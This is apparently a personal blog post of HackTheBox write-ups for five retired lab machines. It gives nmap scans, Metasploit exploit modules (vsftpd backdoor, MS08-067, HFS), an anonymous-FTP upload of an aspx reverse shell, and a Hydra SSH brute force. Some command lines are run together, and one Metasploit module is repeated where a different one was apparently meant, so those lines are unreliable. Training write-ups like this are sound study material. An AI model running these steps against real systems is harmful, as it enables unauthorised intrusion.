My HackTheBox Diarie

5 min readMay 16, 2021

Hi everyone, i started to solving the HTB labs. I’ll explain the solutions as well as the tools i need. I’m trying to go step by step and learn from scratch. This post contains 5 lab solutions (Lame, Legacy, Devel, Beep and Optimum). Let’s try to collect the flags together :)

First Machine: LAME

Firstly, i start with a nmap scan.

Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Pentesters use it to explore the network, discover IP addresses, standing machines and open ports, running services and their versions.

nmap -T4 -A -v 10.10.10.3

A parameter means aggressive scanning
T parameter sets timing template
v parameter increases verbosity level

According to the nmap results, vsftpd 2.3.4 is running on the 21.port.

I checked the payload with searchvsftpd. There is a backdoor in the metasploit.

You can search on msfconsole to find payload.

use exploit/unix/ftp/vsftpd_234_backdoorset rhosts 10.10.10.3run

But this payload didn't work:

I also saw samba in Nmap scan:

The payload i use:

use exploit/unix/ftp/vsftpd_234_backdoorset rhosts 10.10.10.3run

And it was successful :) Now, you can collect the flags.

2-LEGACY

Again i scanned it with nmap as the first step.

nmap -T4 -A -v 10.10.10.4

I found out that smb is open and windows xp is on it

I took advantage of the Ms08–67 vulnerability. You can find it on exploit-db.

use exploit/windows/smb/ms08_067_netapiset rhosts 10.10.10.4run

And the session:

We are in. You can reach the relevant place to collect the flags.

3-DEVEL

Again a nmap scan :) --> nmap -T4 -A -v 10.10.10.5

Anonymous ftp login appears. And iis 7.5 on HTTP.

If you open the "inspect element" by right clicking on the image on the page, you will notice that you are directed to the "/welcome.png" page. For this reason, I made a test like this; i created an HTML page and loaded it using ftp anonymous login and the page opened successfully.

This trial was successful. Since it is IIS, if I send a file with aspx extension and trigger it, it can get a session. Payload creation process with “aspx” extension:

For ftp connection:

ftp 10.10.10.5
Name is “anonymous”
Password is empty
Then you logged in and “put test.aspx”.
You can check the file with “dir” command.

Set payload for session: set payload windows/meterpreter/reverse_tcp

To trigger the reverse shell, you must go to “10.10.10.5/test.aspx” in the browser. But this session does not have permissions.

The “sysinfo” command in the Meterpreter session reveals that the target is x86 architecture, so it is possible to get suggestions with the local_exploit_suggester module.

When it runs, you can find exploits. I saw the kitrap in devil walkthrough so I tried it.

I used this exploit and I'm inside now I can collect the flags.

4-BEEP

I tried default credentials like admin but it didn't work. I looked with Searchsploit.

When you view the file with the nano command, you will see a url. I tried the url in the browser and it really existed.

I collected passwords from this page then i changed url (I typed passwd instead of “amportal.conf”). I also collected usernames from the opened page (/bin/bash ones are valid). Then i saved for the hydra. Hydra is a password detection tool with worldists.

When I looked with the nmap scan, I saw that 22 openssh ports are open. And I tried a bruteforce attack with hydra.

With the correct information, i successfully logged in.

5-OPTIMUM

nmap -T4 -sS -A -v 10.10.10.8

In the nmap results, I saw that HttpFileServer httpd 2.3 on the tcp port. I searched for the relevant exploit and found it at https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec/

The payload → exploit/windows/http/rejetto_hfs_exec (You must also set the srvhost value to your own ip address.) Session occurs when you set and run the settings. You can find a flag from “user.txt.txt”. But we don’t have access for the other. (ACCESS DENIED)